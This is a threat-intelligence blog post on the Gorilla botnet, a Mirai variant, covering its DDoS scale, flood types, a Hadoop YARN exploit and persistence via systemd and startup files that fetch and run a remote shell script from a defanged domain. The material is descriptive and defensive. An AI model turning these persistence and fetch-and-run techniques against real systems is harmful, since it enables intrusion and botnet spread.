300,000+ DDoS Attacks in 100 Countries: The Reach of Gorilla Botnet
Just a SOC Analyst ^^
Cybersecurity researchers have discovered a new botnet malware family named Gorilla (also known as GorillaBot), a variant of the leaked Mirai botnet source code.
General Summary
Gorilla Botnet, a powerful new variant based on the Mirai source code, conducted over 300,000 distributed denial-of-service (DDoS) attacks across more than 100 countries in September 2024. This botnet specifically targeted major entities such as governments, telecommunications, banks, and online gaming services. The goal of the attacks was to disrupt network services, causing significant impacts on the digital systems of many countries.
Gorilla Botnet emerged after the source code of the infamous Mirai botnet was leaked and has been upgraded with more powerful attack methods, exploiting security vulnerabilities in computer systems and IoT (Internet of Things) devices. The DDoS attacks by Gorilla Botnet primarily targeted network infrastructures, crippling the services of many organizations and businesses.
Impact of the Attack
The attack by Gorilla Botnet caused significant global disruption, with key targets including government organizations, financial services, and telecommunications. NSFOCUS, the cybersecurity company that discovered this activity last month, stated that the botnet "conducted over 300,000 attacks, with an astonishing attack density" from September 4 to September 27, 2024. On average, the botnet executed no fewer than 20,000 commands daily to carry out distributed denial-of-service (DDoS) attacks.
Many companies and organizations in countries such as China, the United States, Canada, Germany, and others faced severe disruptions in their business operations.
The banking and financial sectors were heavily impacted by these DDoS attacks, as many online services could not operate continuously, affecting user transactions. Telecommunications services were also interrupted, causing significant difficulties in maintaining communication.
Technical Details
Gorilla Botnet employs various complex DDoS attack techniques, notably including methods such as UDP Flood (41%), ACK Bypass Flood (24%), and VSE Flood (12%). These techniques allow the botnet to generate massive amounts of fake traffic, overwhelming target systems and disrupting network services. Notably, Gorilla also exploits a vulnerability in Apache Hadoop YARN RPC to execute remote code, enabling it to attack and infiltrate large systems without direct interaction from the victim.
Additionally, this botnet uses a persistence technique on servers by creating a service file named custom.service in the /etc/systemd/system/ directory and configuring it to run automatically whenever the system starts.
This task is responsible for downloading and executing a shell script ("lol.sh") from a remote server ("pen.gorillafirewall[.]su"). Similar commands are also added to the files /etc/inittab, /etc/profile, and /boot/bootcmd to download and run the shell script when the system starts or a user logs in.
Recommendations
FPT Threat Intelligence recommends several measures for organizations and individuals to prevent DDoS attacks:
Use firewalls: Network firewalls can help block invalid traffic before it reaches the server.
Use Content Delivery Networks (CDN): CDNs help distribute traffic across multiple servers, reducing the load on the origin server.
Limit bandwidth and filter traffic: Limiting connection speeds and filtering invalid packets help mitigate attacks.
Use cloud solutions: Cloud security services can quickly monitor, detect, and mitigate DDoS attacks.
Mitigate attacks with Captcha or authentication: Applying Captcha authentication for access requests helps reduce automated traffic from botnets.
